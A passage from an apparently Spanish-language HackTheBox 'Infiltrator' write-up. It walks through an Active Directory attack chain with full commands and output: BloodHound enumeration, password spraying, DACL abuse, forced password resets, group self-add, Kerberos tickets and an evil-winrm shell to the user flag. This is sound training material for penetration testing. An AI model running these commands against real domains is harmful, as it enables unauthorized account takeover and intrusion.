10.10.11.31 -u K.turner -p <span class="s1">&#39;MessengerApp@Pass!&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>-<span class="o">]</span> infiltrator.htb<span class="se">\K</span>.turner:MessengerApp@Pass! STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="bloodhound--analysis">Bloodhound &amp; Analysis</h2> <p>Ejecutamos bloodhound con las credenciales de l.clark.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ~/htb/tools/bloodhound-ce/bloodhound.py -u l.clark -p <span class="s1">&#39;WAT?watismypass!&#39;</span> -ns 10.10.11.31 -d infiltrator.htb -c All --zip </span></span><span class="line"><span class="cl">INFO: BloodHound.py <span class="k">for</span> BloodHound Community Edition </span></span><span class="line"><span class="cl">INFO: Found AD domain: infiltrator.htb </span></span><span class="line"><span class="cl">INFO: Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: dc01.infiltrator.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains in the forest </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> computers </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: dc01.infiltrator.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">14</span> users </span></span><span class="line"><span class="cl">INFO: Found <span class="m">58</span> groups </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> gpos </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> ous </span></span><span class="line"><span class="cl">INFO: Found <span class="m">19</span> containers </span></span><span class="line"><span class="cl">INFO: Found <span class="m">0</span> trusts </span></span><span class="line"><span class="cl">INFO: Starting computer enumeration with <span class="m">10</span> workers </span></span><span class="line"><span class="cl">INFO: Querying computer: dc01.infiltrator.htb </span></span><span class="line"><span class="cl">INFO: Done in 00M 50S </span></span><span class="line"><span class="cl">INFO: Compressing output into 20250520200947_bloodhound.zip </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Creamos un wordlist basado en la lista de usuarios de bloodhound para usarlos posteriormente.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ unzip 20250520200947_bloodhound.zip 20250520200947_users.json </span></span><span class="line"><span class="cl">Archive: 20250520200947_bloodhound.zip </span></span><span class="line"><span class="cl"> extracting: 20250520200947_users.json </span></span><span class="line"><span class="cl">❯ jq -r <span class="s1">&#39;.data[].Properties.name&#39;</span> 20250520200947_users.json<span class="p">|</span> tail -n +2 <span class="p">|</span> awk <span class="s1">&#39;{ print tolower($0) }&#39;</span> <span class="p">|</span> cut -d <span class="s1">&#39;@&#39;</span> -f1 &gt; users.txt </span></span><span class="line"><span class="cl">❯ wc -l users.txt </span></span><span class="line"><span class="cl"><span class="m">13</span> users.txt </span></span><span class="line"><span class="cl">❯ cat users.txt </span></span><span class="line"><span class="cl">lan_managment </span></span><span class="line"><span class="cl">infiltrator_svc$ </span></span><span class="line"><span class="cl">winrm_svc </span></span><span class="line"><span class="cl">e.rodriguez </span></span><span class="line"><span class="cl">k.turner </span></span><span class="line"><span class="cl">a.walker </span></span><span class="line"><span class="cl">o.martinez </span></span><span class="line"><span class="cl">m.harris </span></span><span class="line"><span class="cl">l.clark </span></span><span class="line"><span class="cl">d.anderson </span></span><span class="line"><span class="cl">krbtgt </span></span><span class="line"><span class="cl">guest </span></span><span class="line"><span class="cl">administrator </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h4 id="users">Users</h4> <p>En total encontramos once usuarios que pertenece a <code>Domain Users</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222272511.png" alt="image"></p> <h4 id="lclark">l.clark</h4> <p>l.clark unicamente muestra el grupo <code>marketing_team</code> como el mas destacado.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222274642.png" alt="image"></p> <p>Otro miembro de este grupo es <strong>D.anderson</strong>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222274904.png" alt="image"></p> <h4 id="danderson">D.anderson</h4> <p>D.anderson pertence al grupo <code>Protected Users</code>, por lo que al tener de tener acceso a este usuario seria unicamente por Kerberos.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275014.png" alt="image"></p> <p>Tiene permisos <code>GenericAll</code> sobre el OU <code>Marketing Digital</code> y este ultimo contiene al usuario <strong>E.rodriguez</strong> por lo que seria posible acceder a este.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275237.png" alt="image"></p> <h4 id="erodriguez">E.rodriguez</h4> <p>E.rodriguez puede agregarse a si mismo al grupo <code>Chiefs Marketing</code> con ello realizar el cambio de contrasena de <strong>M.Harris</strong>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275602.png" alt="image"></p> <h4 id="mharris">M.Harris</h4> <p>M.harris pertence al grupo <code>Developers</code>. Tambien se muestra <code>Protected Users</code> y <code>Remote Management Users</code>, estos dos ultimos indican acceso por WinRM mediante Kerberos.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275831.png" alt="image"></p> <h4 id="winrm_svc">winrm_svc</h4> <p>El usuario winrm_svc es otro de los miembros de <code>Remote Management Users</code> por lo que tiene acceso a WinRM.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222272702.png" alt="image"></p> <h4 id="omartinez--awalker">O.martinez &amp; A.walker</h4> <p>O.martinez pertenece al grupo de <code>Remote Desktop Users</code> lo que le permite acceder por RDP.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222273127.png" alt="image"></p> <p>Tambien al grupo <code>Chiefs Marketing</code> que permite realizar el cambio de contrasena a <strong>M.harris</strong>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222273253.png" alt="image"></p> <p>Al igual que o.martinez, A.walker puede realizar el cambio de contrasena.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222273429.png" alt="image"></p> <h4 id="lan_managment">lan_managment</h4> <p>lan_managment puede realizar la lectura de contrasena <code>GMSA</code> de <strong>infiltrator_svc$</strong>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222273718.png" alt="image"></p> <h1 id="user---danderson">User - D.anderson</h1> <h2 id="password-spraying">Password Spraying</h2> <p>Ejecutamos netexec con la lista de usuarios y la unica contrasena conocida, encontramos que D.anderson comparte la contrasena con l.clark.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u users.txt -p <span class="s1">&#39;WAT?watismypass!&#39;</span> --continue-on-success <span class="p">|</span> grep + </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:WAT?watismypass! </span></span><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u users.txt -p <span class="s1">&#39;WAT?watismypass!&#39;</span> -k --continue-on-success <span class="p">|</span> grep + </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:WAT?watismypass! </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\d</span>.anderson:WAT?watismypass! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="genericall---marketing-digital">GenericAll -&gt; Marketing Digital</h2> <p>Para abusar de GenericAll sobre Marketing Digital iniciamos solicitando un ticket con <code>getTGT</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ getTGT.py -dc-ip 10.10.11.31 infiltrator.htb/d.anderson:<span class="s1">&#39;WAT?watismypass!&#39;</span> </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in d.anderson.ccache </span></span><span class="line"><span class="cl">❯ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s1">&#39;d.anderson.ccache&#39;</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos <code>dacledit</code> para darle FullControl a d.anderson sobre <code>OU Marketing Digital</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ impacket-dacledit -dc-ip 10.10.11.31 -k -no-pass -action write -rights FullControl -inheritance -principal d.anderson -target-dn <span class="s1">&#39;OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB&#39;</span> infiltrator.htb/d.anderson </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NB: objects with <span class="nv">adminCount</span><span class="o">=</span><span class="m">1</span> will no inherit ACEs from their parent container/OU </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL backed up to dacledit-20250520-222910.bak </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL modified successfully! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="change-password---erodriguez">Change Password - E.rodriguez</h2> <p>El OU contiene a E.Rodriguez por lo que es posible realizar el cambio de contrasena. Realizamos el cambio con <code>bloodyAD</code> especificando autenticacion kerberos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ~/htb/tools/bloodyAD/bloodyAD.py --host <span class="s2">&#34;dc01.infiltrator.htb&#34;</span> -d <span class="s2">&#34;infiltrator.htb&#34;</span> -u <span class="s2">&#34;d.anderson&#34;</span> -k <span class="nb">set</span> password <span class="s2">&#34;E.rodriguez&#34;</span> <span class="s2">&#34;5upper@338&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Password changed successfully! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---erodriguez">User - E.rodriguez</h1> <p>Confirmamos que la contrasena permite el acceso por smb y ldap.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u E.rodriguez -p <span class="s1">&#39;5upper@338&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\E</span>.rodriguez:5upper@338 </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 SYSVOL READ Logon server share </span></span><span class="line"><span class="cl">❯ netexec ldap 10.10.11.31 -u E.rodriguez -p <span class="s1">&#39;5upper@338&#39;</span> </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\E</span>.rodriguez:5upper@338 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="addself---chiefs-marketing">Addself -&gt; Chiefs Marketing</h2> <p>E.rodriguez puede agregarse al grupo Chiefs Marketing, ejecutamos bloodyAD para lograrlo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ~/htb/tools/bloodyAD/bloodyAD.py --host <span class="s2">&#34;10.10.11.31&#34;</span> -d <span class="s2">&#34;infiltrator.htb&#34;</span> -u <span class="s2">&#34;E.rodriguez&#34;</span> -p <span class="s2">&#34;5upper@338&#34;</span> add groupMember <span class="s2">&#34;Chiefs Marketing&#34;</span> <span class="s2">&#34;E.rodriguez&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> E.rodriguez added to Chiefs Marketing </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="forcechangepassword---mharris">ForceChangePassword -&gt; M.Harris</h2> <p>Realizamos el cambio de contrasena de M.Harris utilizando <code>net</code>. M.harris al pertenecer al grupo de Protected Users puede autenticarse por kerberos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ net rpc password <span class="s2">&#34;M.Harris&#34;</span> <span class="s2">&#34;newP@ssword2025&#34;</span> -U <span class="s2">&#34;infiltrator.htb&#34;</span>/<span class="s2">&#34;E.rodriguez&#34;</span>%<span class="s2">&#34;5upper@338&#34;</span> -S <span class="s2">&#34;10.10.11.31&#34;</span> </span></span><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u M.Harris -p <span class="s1">&#39;newP@ssword2025&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>-<span class="o">]</span> infiltrator.htb<span class="se">\M</span>.Harris:newP@ssword2025 STATUS_ACCOUNT_RESTRICTION </span></span><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u M.Harris -p <span class="s1">&#39;newP@ssword2025&#39;</span> -k </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\M</span>.Harris:newP@ssword2025 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---mharris">User - M.harris</h1> <p>M.harris puede acceder al servicio WinRM por Kerberos, solicitamos un ticket.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ getTGT.py -dc-ip 10.10.11.31 infiltrator.htb/M.Harris:<span class="s1">&#39;newP@ssword2025&#39;</span> </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in M.Harris.ccache </span></span><span class="line"><span class="cl">❯ </span></span><span class="line"><span class="cl">❯ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s1">&#39;M.Harris.ccache&#39;</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Modificamos el archivo <code>/etc/krb5.conf</code> con la configuracion para la maquina.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ cat /etc/krb5.conf </span></span><span class="line"><span class="cl"><span class="o">[</span>libdefaults<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">default_realm</span> <span class="o">=</span> INFILTRATOR.HTB </span></span><span class="line"><span class="cl"> <span class="nv">dns_lookup_realm</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"> <span class="nv">dns_lookup_kdc</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>realms<span class="o">]</span> </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB <span class="o">=</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">kdc</span> <span class="o">=</span> dc01.infiltrator.htb </span></span><span class="line"><span class="cl"> <span class="nv">admin_server</span> <span class="o">=</span> dc01.infiltrator.htb </span></span><span class="line"><span class="cl"> <span class="nv">default_domain</span> <span class="o">=</span> infiltrator.htb </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>domain_realm<span class="o">]</span> </span></span><span class="line"><span class="cl"> INFILTRATOR.htb <span class="o">=</span> INFILTRATOR.HTB </span></span><span class="line"><span class="cl"> .INFILTRATOR.htb <span class="o">=</span> INFILTRATOR.HTB </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos <code>evil-winrm</code> logrando obtener una shell como M.harris y acceso a la flag <code>user.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ evil-winrm -i dc01.infiltrator.htb -r INFILTRATOR.HTB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: undefined method <span class="sb">`</span>quoting_detection_proc<span class="err">&#39;</span> <span class="k">for</span> module Reline </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\M</span>.harris<span class="se">\D</span>ocuments&gt; whoami </span></span><span class="line"><span class="cl">infiltrator<span class="se">\m</span>.harris </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\M</span>.harris<span class="se">\D</span>ocuments&gt; cat ../Desktop/user.txt </span></span><span class="line"><span class="cl">4fba3cc5848d2931c44b4a19b541fafd </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\M</span>.harris<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h1 id="output-messenger">Output Messenger</h1> <p>Tras enumerar los directorios descubrimos que existe y esta en ejecucion tanto cliente como servidor de <a href="https://www.outputmessenger.com/">Output Messenger</a>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\P</span>rogram Files&gt; dir -force </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\P</span>rogram Files </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 12/4/2023 9:22 AM Common Files </span></span><span class="line"><span class="cl">d----- 8/21/2024 1:50 PM Hyper-V </span></span><span class="line"><span class="cl">d----- 2/19/2024 3:52 AM internet explorer </span></span><span class="line"><span class="cl">d----- 2/23/2024 5:06 AM Output Messenger </span></span><span class="line"><span class="cl">d----- 5/27/2025 5:43 PM Output Messenger Server </span></span><span class="line"><span class="cl">d----- 12/12/2023 10:04 AM PackageManagement </span></span><span class="line"><span class="cl">d--h-- 12/4/2023 9:22 AM Uninstall Information </span></span><span class="line"><span class="cl">d----- 2/19/2024 4:16 AM Update Services </span></span><span class="line"><span class="cl">d----- 12/4/2023 9:23 AM VMware </span></span><span class="line"><span class="cl">d-r--- 11/5/2022 12:03 PM Windows Defender </span></span><span class="line"><span class="cl">d----- 8/21/2024 1:50 PM Windows Defender Advanced Threat Protection </span></span><span class="line"><span class="cl">d----- 11/5/2022 12:03 PM Windows Mail </span></span><span class="line"><span class="cl">d----- 8/21/2024 1:50 PM Windows Media Player </span></span><span class="line"><span class="cl">d----- 9/15/2018 12:19 AM Windows Multimedia Platform </span></span><span class="line"><span class="cl">d----- 9/15/2018 12:28 AM windows nt </span></span><span class="line"><span class="cl">d----- 11/5/2022 12:03 PM Windows Photo Viewer </span></span><span class="line"><span class="cl">d----- 9/15/2018 12:19 AM Windows Portable Devices </span></span><span class="line"><span class="cl">d----- 9/15/2018 12:19 AM Windows Security </span></span><span class="line"><span class="cl">d--hs- 9/15/2018 12:19 AM Windows Sidebar </span></span><span class="line"><span class="cl">d--h-- 9/15/2018 12:19 AM WindowsApps </span></span><span class="line"><span class="cl">d----- 12/12/2023 10:04 AM WindowsPowerShell </span></span><span class="line"><span class="cl">-a-hs- 9/15/2018 12:16 AM <span class="m">174</span> desktop.ini </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\P</span>rogram Files&gt; netstat -ano <span class="p">|</span> findstr /v UDP <span 